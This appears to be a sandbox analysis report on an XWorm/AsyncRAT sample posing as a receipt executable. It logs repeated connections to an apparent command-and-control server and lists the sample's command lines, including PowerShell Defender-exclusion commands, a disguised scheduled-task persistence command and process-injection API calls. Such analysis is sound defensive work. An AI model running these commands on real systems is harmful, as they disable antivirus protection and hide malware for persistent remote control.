Dec 31, 2024 13:31:19.713928938 CET  154.39.0.150:5200 -> 192.168.2.4:50044
Dec 31, 2024 13:31:19.713987112 CET  192.168.2.4:50044 -> 154.39.0.150:5200
Dec 31, 2024 13:31:19.743900061 CET  192.168.2.4:50044 -> 154.39.0.150:5200
Dec 31, 2024 13:31:19.748661041 CET  154.39.0.150:5200 -> 192.168.2.4:50044
Dec 31, 2024 13:31:21.097089052 CET  154.39.0.150:5200 -> 192.168.2.4:50044
Dec 31, 2024 13:31:21.097162008 CET  192.168.2.4:50044 -> 154.39.0.150:5200
Dec 31, 2024 13:31:24.814543009 CET  192.168.2.4:50044 -> 154.39.0.150:5200
Dec 31, 2024 13:31:24.816337109 CET  192.168.2.4:50045 -> 154.39.0.150:5200
Dec 31, 2024 13:31:24.819463015 CET  154.39.0.150:5200 -> 192.168.2.4:50044
Dec 31, 2024 13:31:24.823327065 CET  154.39.0.150:5200 -> 192.168.2.4:50045
Dec 31, 2024 13:31:24.823394060 CET  192.168.2.4:50045 -> 154.39.0.150:5200
Dec 31, 2024 13:31:24.852844954 CET  192.168.2.4:50045 -> 154.39.0.150:5200
Dec 31, 2024 13:31:24.858863115 CET  154.39.0.150:5200 -> 192.168.2.4:50045
Dec 31, 2024 13:31:26.239078999 CET  154.39.0.150:5200 -> 192.168.2.4:50045
Dec 31, 2024 13:31:26.239154100 CET  192.168.2.4:50045 -> 154.39.0.150:5200
Dec 31, 2024 13:31:29.892308950 CET  192.168.2.4:50045 -> 154.39.0.150:5200
Dec 31, 2024 13:31:29.893136024 CET  192.168.2.4:50046 -> 154.39.0.150:5200
Dec 31, 2024 13:31:29.897232056 CET  154.39.0.150:5200 -> 192.168.2.4:50045
Dec 31, 2024 13:31:29.897926092 CET  154.39.0.150:5200 -> 192.168.2.4:50046
Dec 31, 2024 13:31:29.897999048 CET  192.168.2.4:50046 -> 154.39.0.150:5200
Dec 31, 2024 13:31:30.043037891 CET  192.168.2.4:50046 -> 154.39.0.150:5200
Dec 31, 2024 13:31:30.047818899 CET  154.39.0.150:5200 -> 192.168.2.4:50046
Dec 31, 2024 13:31:30.204822063 CET  192.168.2.4:50046 -> 154.39.0.150:5200
Dec 31, 2024 13:31:30.209681988 CET  154.39.0.150:5200 -> 192.168.2.4:50046
Dec 31, 2024 13:31:31.285463095 CET  154.39.0.150:5200 -> 192.168.2.4:50046
Dec 31, 2024 13:31:31.285518885 CET  192.168.2.4:50046 -> 154.39.0.150:5200
Dec 31, 2024 13:31:35.392205000 CET  192.168.2.4:50046 -> 154.39.0.150:5200
Dec 31, 2024 13:31:35.394139051 CET  192.168.2.4:50047 -> 154.39.0.150:5200
Dec 31, 2024 13:31:35.397062063 CET  154.39.0.150:5200 -> 192.168.2.4:50046
Dec 31, 2024 13:31:35.398967981 CET  154.39.0.150:5200 -> 192.168.2.4:50047
Dec 31, 2024 13:31:35.399029970 CET  192.168.2.4:50047 -> 154.39.0.150:5200
Dec 31, 2024 13:31:35.433307886 CET  192.168.2.4:50047 -> 154.39.0.150:5200
Dec 31, 2024 13:31:35.438121080 CET  154.39.0.150:5200 -> 192.168.2.4:50047
Dec 31, 2024 13:31:35.454901934 CET  192.168.2.4:50047 -> 154.39.0.150:5200
Dec 31, 2024 13:31:35.459680080 CET  154.39.0.150:5200 -> 192.168.2.4:50047
Dec 31, 2024 13:31:35.470472097 CET  192.168.2.4:50047 -> 154.39.0.150:5200
Dec 31, 2024 13:31:35.475282907 CET  154.39.0.150:5200 -> 192.168.2.4:50047
Dec 31, 2024 13:31:35.532843113 CET  192.168.2.4:50047 -> 154.39.0.150:5200
Dec 31, 2024 13:31:35.537661076 CET  154.39.0.150:5200 -> 192.168.2.4:50047
Dec 31, 2024 13:31:35.704931021 CET  192.168.2.4:50047 -> 154.39.0.150:5200
Dec 31, 2024 13:31:35.709795952 CET  154.39.0.150:5200 -> 192.168.2.4:50047
Dec 31, 2024 13:31:36.801862001 CET  154.39.0.150:5200 -> 192.168.2.4:50047
Dec 31, 2024 13:31:36.801937103 CET  192.168.2.4:50047 -> 154.39.0.150:5200
Dec 31, 2024 13:31:40.735876083 CET  192.168.2.4:50047 -> 154.39.0.150:5200
Dec 31, 2024 13:31:40.739497900 CET  192.168.2.4:50048 -> 154.39.0.150:5200
Dec 31, 2024 13:31:40.740760088 CET  154.39.0.150:5200 -> 192.168.2.4:50047
Dec 31, 2024 13:31:40.744369984 CET  154.39.0.150:5200 -> 192.168.2.4:50048
Dec 31, 2024 13:31:40.744503021 CET  192.168.2.4:50048 -> 154.39.0.150:5200
Dec 31, 2024 13:31:40.813427925 CET  192.168.2.4:50048 -> 154.39.0.150:5200
Dec 31, 2024 13:31:40.818182945 CET  154.39.0.150:5200 -> 192.168.2.4:50048
Dec 31, 2024 13:31:42.148250103 CET  154.39.0.150:5200 -> 192.168.2.4:50048
Dec 31, 2024 13:31:42.149209976 CET  192.168.2.4:50048 -> 154.39.0.150:5200
Dec 31, 2024 13:31:45.862332106 CET  192.168.2.4:50048 -> 154.39.0.150:5200
Dec 31, 2024 13:31:45.864850998 CET  192.168.2.4:50049 -> 154.39.0.150:5200
Dec 31, 2024 13:31:45.867167950 CET  154.39.0.150:5200 -> 192.168.2.4:50048
Dec 31, 2024 13:31:45.869673014 CET  154.39.0.150:5200 -> 192.168.2.4:50049
Dec 31, 2024 13:31:45.869752884 CET  192.168.2.4:50049 -> 154.39.0.150:5200
Dec 31, 2024 13:31:46.124030113 CET  192.168.2.4:50049 -> 154.39.0.150:5200
Dec 31, 2024 13:31:46.129040003 CET  154.39.0.150:5200 -> 192.168.2.4:50049
Dec 31, 2024 13:31:47.277570963 CET  154.39.0.150:5200 -> 192.168.2.4:50049
Dec 31, 2024 13:31:47.277641058 CET  192.168.2.4:50049 -> 154.39.0.150:5200
Dec 31, 2024 13:31:51.157812119 CET  192.168.2.4:50049 -> 154.39.0.150:5200
Dec 31, 2024 13:31:51.161258936 CET  192.168.2.4:50050 -> 154.39.0.150:5200
Dec 31, 2024 13:31:51.162942886 CET  154.39.0.150:5200 -> 192.168.2.4:50049
Dec 31, 2024 13:31:51.166035891 CET  154.39.0.150:5200 -> 192.168.2.4:50050
Dec 31, 2024 13:31:51.166100979 CET  192.168.2.4:50050 -> 154.39.0.150:5200
Dec 31, 2024 13:31:51.211040020 CET  192.168.2.4:50050 -> 154.39.0.150:5200
Dec 31, 2024 13:31:51.215883017 CET  154.39.0.150:5200 -> 192.168.2.4:50050
Dec 31, 2024 13:31:51.236032009 CET  192.168.2.4:50050 -> 154.39.0.150:5200
Dec 31, 2024 13:31:51.240884066 CET  154.39.0.150:5200 -> 192.168.2.4:50050
Dec 31, 2024 13:31:52.550896883 CET  154.39.0.150:5200 -> 192.168.2.4:50050
Dec 31, 2024 13:31:52.550993919 CET  192.168.2.4:50050 -> 154.39.0.150:5200
Dec 31, 2024 13:31:56.236337900 CET  192.168.2.4:50050 -> 154.39.0.150:5200
Dec 31, 2024 13:31:56.239016056 CET  192.168.2.4:50051 -> 154.39.0.150:5200
Dec 31, 2024 13:31:56.241199970 CET  154.39.0.150:5200 -> 192.168.2.4:50050
Dec 31, 2024 13:31:56.243792057 CET  154.39.0.150:5200 -> 192.168.2.4:50051
Dec 31, 2024 13:31:56.243958950 CET  192.168.2.4:50051 -> 154.39.0.150:5200
Dec 31, 2024 13:31:56.338366985 CET  192.168.2.4:50051 -> 154.39.0.150:5200
Dec 31, 2024 13:31:56.343158960 CET  154.39.0.150:5200 -> 192.168.2.4:50051
Dec 31, 2024 13:31:57.650198936 CET  154.39.0.150:5200 -> 192.168.2.4:50051
Dec 31, 2024 13:31:57.650274038 CET  192.168.2.4:50051 -> 154.39.0.150:5200
Dec 31, 2024 13:32:01.455841064 CET  192.168.2.4:50051 -> 154.39.0.150:5200
Dec 31, 2024 13:32:01.457478046 CET  192.168.2.4:50052 -> 154.39.0.150:5200
Dec 31, 2024 13:32:01.460870981 CET  154.39.0.150:5200 -> 192.168.2.4:50051
Dec 31, 2024 13:32:01.462285995 CET  154.39.0.150:5200 -> 192.168.2.4:50052
Dec 31, 2024 13:32:01.462357998 CET  192.168.2.4:50052 -> 154.39.0.150:5200
Dec 31, 2024 13:32:01.845232964 CET  192.168.2.4:50052 -> 154.39.0.150:5200
Dec 31, 2024 13:32:01.850127935 CET  154.39.0.150:5200 -> 192.168.2.4:50052
Dec 31, 2024 13:32:02.847423077 CET  154.39.0.150:5200 -> 192.168.2.4:50052
Dec 31, 2024 13:32:02.847498894 CET  192.168.2.4:50052 -> 154.39.0.150:5200
Dec 31, 2024 13:32:07.329713106 CET  192.168.2.4:50052 -> 154.39.0.150:5200
Dec 31, 2024 13:32:07.334623098 CET  154.39.0.150:5200 -> 192.168.2.4:50052
Dec 31, 2024 13:32:07.336709976 CET  192.168.2.4:50053 -> 154.39.0.150:5200
Dec 31, 2024 13:32:07.341551065 CET  154.39.0.150:5200 -> 192.168.2.4:50053
Dec 31, 2024 13:32:07.341628075 CET  192.168.2.4:50053 -> 154.39.0.150:5200
Dec 31, 2024 13:32:07.366065979 CET  192.168.2.4:50053 -> 154.39.0.150:5200
Dec 31, 2024 13:32:07.370821953 CET  154.39.0.150:5200 -> 192.168.2.4:50053
Dec 31, 2024 13:32:08.740092993 CET  154.39.0.150:5200 -> 192.168.2.4:50053
Dec 31, 2024 13:32:08.740505934 CET  192.168.2.4:50053 -> 154.39.0.150:5200
Dec 31, 2024 13:32:12.501746893 CET  192.168.2.4:50053 -> 154.39.0.150:5200
Dec 31, 2024 13:32:12.503000975 CET  192.168.2.4:50054 -> 154.39.0.150:5200
Dec 31, 2024 13:32:12.506717920 CET  154.39.0.150:5200 -> 192.168.2.4:50053
Dec 31, 2024 13:32:12.507877111 CET  154.39.0.150:5200 -> 192.168.2.4:50054
Dec 31, 2024 13:32:12.508110046 CET  192.168.2.4:50054 -> 154.39.0.150:5200
Dec 31, 2024 13:32:12.762531996 CET  192.168.2.4:50054 -> 154.39.0.150:5200
Dec 31, 2024 13:32:12.767360926 CET  154.39.0.150:5200 -> 192.168.2.4:50054
Dec 31, 2024 13:32:13.915994883 CET  154.39.0.150:5200 -> 192.168.2.4:50054
Dec 31, 2024 13:32:13.922139883 CET  192.168.2.4:50054 -> 154.39.0.150:5200
Dec 31, 2024 13:32:17.814120054 CET  192.168.2.4:50054 -> 154.39.0.150:5200
Dec 31, 2024 13:32:17.818991899 CET  154.39.0.150:5200 -> 192.168.2.4:50054
Dec 31, 2024 13:32:17.822031021 CET  192.168.2.4:50055 -> 154.39.0.150:5200
Dec 31, 2024 13:32:17.826867104 CET  154.39.0.150:5200 -> 192.168.2.4:50055
Dec 31, 2024 13:32:17.826946974 CET  192.168.2.4:50055 -> 154.39.0.150:5200
Dec 31, 2024 13:32:17.887653112 CET  192.168.2.4:50055 -> 154.39.0.150:5200
Dec 31, 2024 13:32:17.892549038 CET  154.39.0.150:5200 -> 192.168.2.4:50055
Dec 31, 2024 13:32:18.017455101 CET  192.168.2.4:50055 -> 154.39.0.150:5200
Dec 31, 2024 13:32:18.022295952 CET  154.39.0.150:5200 -> 192.168.2.4:50055
Dec 31, 2024 13:32:18.033123970 CET  192.168.2.4:50055 -> 154.39.0.150:5200
Dec 31, 2024 13:32:18.038084984 CET  154.39.0.150:5200 -> 192.168.2.4:50055
Dec 31, 2024 13:32:18.064145088 CET  192.168.2.4:50055 -> 154.39.0.150:5200
Dec 31, 2024 13:32:18.068895102 CET  154.39.0.150:5200 -> 192.168.2.4:50055
Dec 31, 2024 13:32:19.222969055 CET  154.39.0.150:5200 -> 192.168.2.4:50055
Dec 31, 2024 13:32:19.223078966 CET  192.168.2.4:50055 -> 154.39.0.150:5200
Dec 31, 2024 13:32:23.098418951 CET  192.168.2.4:50055 -> 154.39.0.150:5200
Dec 31, 2024 13:32:23.103430986 CET  154.39.0.150:5200 -> 192.168.2.4:50055
Dec 31, 2024 13:32:23.105778933 CET  192.168.2.4:50056 -> 154.39.0.150:5200
Dec 31, 2024 13:32:23.110626936 CET  154.39.0.150:5200 -> 192.168.2.4:50056
Dec 31, 2024 13:32:23.112138987 CET  192.168.2.4:50056 -> 154.39.0.150:5200
Dec 31, 2024 13:32:23.405764103 CET  192.168.2.4:50056 -> 154.39.0.150:5200
Dec 31, 2024 13:32:23.410762072 CET  154.39.0.150:5200 -> 192.168.2.4:50056
Dec 31, 2024 13:32:24.504471064 CET  154.39.0.150:5200 -> 192.168.2.4:50056
Dec 31, 2024 13:32:24.504529953 CET  192.168.2.4:50056 -> 154.39.0.150:5200
Dec 31, 2024 13:32:28.658221006 CET  192.168.2.4:50056 -> 154.39.0.150:5200
Dec 31, 2024 13:32:28.660034895 CET  192.168.2.4:50057 -> 154.39.0.150:5200
Dec 31, 2024 13:32:28.663074970 CET  154.39.0.150:5200 -> 192.168.2.4:50056
Dec 31, 2024 13:32:28.664869070 CET  154.39.0.150:5200 -> 192.168.2.4:50057
Dec 31, 2024 13:32:28.668180943 CET  192.168.2.4:50057 -> 154.39.0.150:5200
Dec 31, 2024 13:32:28.723372936 CET  192.168.2.4:50057 -> 154.39.0.150:5200
Dec 31, 2024 13:32:28.728202105 CET  154.39.0.150:5200 -> 192.168.2.4:50057
Dec 31, 2024 13:32:29.314249039 CET  192.168.2.4:50057 -> 154.39.0.150:5200
Dec 31, 2024 13:32:29.319108009 CET  154.39.0.150:5200 -> 192.168.2.4:50057
Dec 31, 2024 13:32:30.053278923 CET  154.39.0.150:5200 -> 192.168.2.4:50057
Dec 31, 2024 13:32:30.053344011 CET  192.168.2.4:50057 -> 154.39.0.150:5200
Dec 31, 2024 13:32:34.481625080 CET  192.168.2.4:50057 -> 154.39.0.150:5200
                                                                Dec 31, 2024 13:32:34.483974934 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:34.486452103 CET520050057154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:34.488893032 CET520050058154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:34.488977909 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:34.645347118 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:34.650242090 CET520050058154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:35.897083998 CET520050058154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:35.897167921 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.111052990 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.112348080 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.115854025 CET520050058154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:40.117090940 CET520050059154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:40.117145061 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.150762081 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.155534983 CET520050059154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:41.520095110 CET520050059154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:41.520163059 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.173573017 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.176352978 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.178381920 CET520050059154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:45.181200981 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:45.181288004 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.227878094 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.232640028 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:45.673619986 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.678513050 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:46.568617105 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:46.570352077 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.736315012 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.740644932 CET500615200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.741197109 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:50.745485067 CET520050061154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:50.745539904 CET500615200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.780961037 CET500615200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.785725117 CET520050061154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:50.908138990 CET500615200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.912951946 CET520050061154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:52.165106058 CET520050061154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:52.165174007 CET500615200192.168.2.4154.39.0.150


                                                                Target ID:0
                                                                Start time:07:28:53
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Receipt-#202431029B.exe"
                                                                Imagebase:0x160000
                                                                File size:633'344 bytes
                                                                MD5 hash:5322ECE916271AD6517A171BE2A5A378
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"
                                                                Imagebase:0x5b0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"
                                                                Imagebase:0x5b0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"
                                                                Imagebase:0x5a0000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Receipt-#202431029B.exe"
                                                                Imagebase:0xad0000
                                                                File size:633'344 bytes
                                                                MD5 hash:5322ECE916271AD6517A171BE2A5A378
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:07:28:56
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                Imagebase:0x800000
                                                                File size:633'344 bytes
                                                                MD5 hash:5322ECE916271AD6517A171BE2A5A378
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 74%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:07:28:57
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff693ab0000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:07:28:59
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp"
                                                                Imagebase:0x5a0000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:07:28:59
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:07:29:00
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\XetHVID.exe"
                                                                Imagebase:0x860000
                                                                File size:633'344 bytes
                                                                MD5 hash:5322ECE916271AD6517A171BE2A5A378
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:07:32:53
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 2132
                                                                Imagebase:0x910000
                                                                File size:483'680 bytes
                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false


                                                                  Execution Graph

                                                                  Execution Coverage:9%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:1.7%
                                                                  Total number of Nodes:238
                                                                  Total number of Limit Nodes:15
[Execution graph node listing omitted. The graph's nodes are call sites for the following APIs: GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, PostMessageW, CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread, ReadProcessMemory, DrawTextExW, GetModuleHandleW, CreateActCtxA, DuplicateHandle.]
7574188 PostMessageW 51253->51255 51254->51251 51255->51254 51257 75799d0 PostMessageW 51256->51257 51258 7579a3c 51257->51258 51258->51249 51303 7579eb8 51304 7579ed2 51303->51304 51308 757a16f 51304->51308 51312 757a338 51304->51312 51305 7579f2e 51310 757a17d 51308->51310 51309 757a1e6 51309->51305 51310->51309 51311 7574228 PostMessageW 51310->51311 51311->51309 51314 757a583 51312->51314 51315 757a370 51312->51315 51313 7574228 PostMessageW 51313->51314 51314->51305 51315->51313 51315->51314
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1694046517.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8b30000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (odq$4'dq$4'dq$4'dq$4'dq
                                                                  • API String ID: 0-1368831844
                                                                  • Opcode ID: fa85505531a2123b1b21166e10fed8c04c9f98f888477c3b2afda6cbdd0cced4
                                                                  • Instruction ID: d05abb2f66758964fc22c87ffc60709e585646deae88b676213ddb5786244b0c
                                                                  • Opcode Fuzzy Hash: fa85505531a2123b1b21166e10fed8c04c9f98f888477c3b2afda6cbdd0cced4
                                                                  • Instruction Fuzzy Hash: 0143C574A00229DFCB24DF68C988A9DB7B2BF99311F1585D9D409AB361DB31ED82CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1694046517.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8b30000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (odq$(odq$,hq$,hq$Hhq
                                                                  • API String ID: 0-2569284993
                                                                  • Opcode ID: 27f2d9e3c20cd9f489aa948e5f8c3138417cac7e016096ecb3c9f61ca072a89e
                                                                  • Instruction ID: a827f2187aabdec56e4320347c3b6e83689c9f13338d94d47397552e3e2217e7
                                                                  • Opcode Fuzzy Hash: 27f2d9e3c20cd9f489aa948e5f8c3138417cac7e016096ecb3c9f61ca072a89e
                                                                  • Instruction Fuzzy Hash: A5526034A00225DFCB14DF69D494A6EBBF2FF88311B5581A9E816DB361DB35EC42CB90

                                                                  Control-flow Graph

                                                                  control_flow_graph 1533 a23e34-a26fc2 1536 a26fc4 1533->1536 1537 a26fc9-a27153 call a25c74 call a25c84 call a25c94 call a25ca4 call a201f8 * 4 1533->1537 1536->1537 1569 a27160-a27247 1537->1569 1570 a27155-a2715b 1537->1570 1583 a2724f 1569->1583 1571 a27252-a2725f 1570->1571 1583->1571
